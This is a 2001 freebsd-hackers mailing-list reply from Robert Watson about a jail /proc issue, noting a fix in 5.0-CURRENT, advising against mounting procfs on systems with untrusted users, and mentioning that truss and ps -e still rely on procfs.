Date:      Tue, 30 Oct 2001 17:01:16 -0500 (EST)
From:      Robert Watson <rwatson@freebsd.org>
To:        opr <opr@bsdaemon.be>
Cc:        freebsd-hackers@freebsd.org
Subject:   Re: jail's /proc

This is fixed in 5.0-CURRENT, but the architectural improvements to
support the fix have not been merged, since they're still in flux.  My
general advice is to not mount procfs on systems with untrusted users.
It's almost possible to not lose functionality in doing that -- I
understand DES has patches to truss to make it use ptrace(), which is the
last remaining instance I can think of.

(actually, I think ps -e requires procfs still)